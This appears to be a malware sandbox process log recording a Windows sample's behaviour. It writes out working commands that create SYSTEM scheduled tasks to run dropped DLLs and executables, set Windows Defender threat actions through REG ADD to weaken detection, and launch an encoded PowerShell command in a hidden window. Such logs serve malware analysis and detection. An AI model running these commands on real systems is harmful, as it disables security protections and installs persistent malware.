schtasks /CREATE /TN "ChSiuBhrWLQfWhgdkuF2" /F /xml "C:\Program Files (x86)\MCoLVEAxuDhpC\ETfSDLy.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:14248

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "hMZOFgVuABkGdcuhk" /SC once /ST 01:42:50 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZKIEJJPSRIlthXTT\enOqmRyB\xettwHL.dll\",#1 /site_id 754" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:360

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "hMZOFgVuABkGdcuhk"
2⤵
PID:14376

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "spuNwBvNokDa" /SC once /ST 10:26:05 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\SpgccBBp\aBzoTjM.exe\" U4 /S"
2⤵
- Creates scheduled task(s)
PID:14876

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "spuNwBvNokDa"
2⤵
PID:12148

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x40c
1⤵
PID:15712

\??\c:\windows\system32\rundll32.EXE
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\ZKIEJJPSRIlthXTT\enOqmRyB\xettwHL.dll",#1 /site_id 754
1⤵
PID:5924

C:\Windows\SysWOW64\rundll32.exe
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\ZKIEJJPSRIlthXTT\enOqmRyB\xettwHL.dll",#1 /site_id 754
2⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
PID:6816

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "hMZOFgVuABkGdcuhk"
3⤵
PID:15072

C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\SpgccBBp\aBzoTjM.exe
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\SpgccBBp\aBzoTjM.exe U4 /S
1⤵
PID:14992

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9924

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:10172

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Modifies data under HKEY_USERS
PID:11392

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4784

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:9804

C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\Ehlsplu.exe
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\Ehlsplu.exe nh /site_id 754 /S
1⤵
PID:5704

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:14296

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:10716

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:10460

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:14192

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:11352

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:10552

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:11360

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:5180

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:11444

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:7740

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:9996

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:7724

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:10096

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:11376

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:11728

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:13024

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:9980

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:8784

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:11188

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:12416

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:14016

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:14928

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "cbBtQoNpOByPPTwrn" /SC once /ST 06:40:16 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\QDsgliQ.exe\" V8 /site_id 754 /S" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:15136

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "cbBtQoNpOByPPTwrn"
2⤵
PID:14800

C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\QDsgliQ.exe
C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\QDsgliQ.exe V8 /site_id 754 /S
1⤵
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:4628

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bWIRRaDZCpCYZHZEtf"
2⤵
PID:5428

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
2⤵
PID:11484

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
3⤵
PID:11960

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
2⤵
PID:5976

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
3⤵
PID:17284

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JDaUpqLWU\bipxWr.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qTJPyBJZsADsDDd" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2392

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qTJPyBJZsADsDDd2" /F /xml "C:\Program Files (x86)\JDaUpqLWU\mzjxLie.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:12116

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "qTJPyBJZsADsDDd"
2⤵
PID:12608

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "qTJPyBJZsADsDDd"
2⤵
PID:17264

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "LMVWktnylhEgic" /F /xml "C:\Program Files (x86)\CzJsMnpmYIHU2\GtplMFg.xml" /RU "SYSTEM"
2⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Creates scheduled task(s)
PID:8060

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "LmWwWbygFrIYQ2" /F /xml "C:\ProgramData\pJxacTbbSlizmPVB\aRYukxX.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:8040

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "kIaWWMRbvXNLsrwhO2" /F /xml "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\rVhxGOd.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:6460

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ChSiuBhrWLQfWhgdkuF2" /F /xml "C:\Program Files (x86)\MCoLVEAxuDhpC\ZGjesCD.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:6860

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "spuwdXuKdRzG" /SC once /ST 03:56:36 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\apBmsbRX\VsCbUqq.exe\" U4 /S"
2⤵
- Creates scheduled task(s)
PID:10140

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "spuwdXuKdRzG"
2⤵
PID:11416

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:10184

C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\apBmsbRX\VsCbUqq.exe
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\apBmsbRX\VsCbUqq.exe U4 /S
1⤵
PID:8416

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:14020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5764

C:\Users\Admin\AppData\Roaming\jgsdgss
C:\Users\Admin\AppData\Roaming\jgsdgss
1⤵
PID:1144

C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\OiRQGqF.exe
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\OiRQGqF.exe nh /site_id 754 /S
1⤵
PID:8976

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:15392

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:7124

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:10548

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:10756

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:10988

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:16780

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:13520

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:5220

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:8688

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:17452

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:11884

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:6768

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:14252

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:17768

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:18128

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:17596

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:17704

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:17792

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:17836

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:17888

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:17976

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:18024

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "cbBtQoNpOByPPTwrn" /SC once /ST 13:30:44 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\DNnZcAy.exe\" V8 /site_id 754 /S" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:18108

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "cbBtQoNpOByPPTwrn"
2⤵
PID:18272

C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\DNnZcAy.exe
C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\DNnZcAy.exe V8 /site_id 754 /S
1⤵
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:8996

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bWIRRaDZCpCYZHZEtf"
2⤵
PID:5296

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
2⤵
PID:9456

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:14348

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
3⤵
PID:7408

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
2⤵
PID:2604

